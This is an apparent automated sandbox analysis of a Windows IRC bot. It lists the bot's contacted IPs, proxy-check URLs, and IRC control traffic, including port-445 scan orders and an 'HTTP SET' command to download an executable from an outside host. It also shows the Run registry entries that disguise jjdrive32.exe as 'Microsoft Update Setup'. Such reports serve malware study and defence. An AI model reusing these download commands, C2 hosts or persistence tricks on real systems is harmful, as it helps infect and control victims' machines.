195.190.13.163(hub.us.com)

Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
195.190.13.163 47221

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi

MODE [N00_USA_XP_2766612]
@ -ix
PRIVMSG [N00_USA_XP_2766
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #g -ix
MODE #sa -ix
PRIVMSG #r :HTTP SET http://zonetech.info/61.exe

Other details

* The following ports were open in the system:


Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"

so that jjdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"

so that jjdrive32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
jjdrive32.exe %Windir%\jjdrive32.exe 339 968 bytes

* Note:
o %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt.
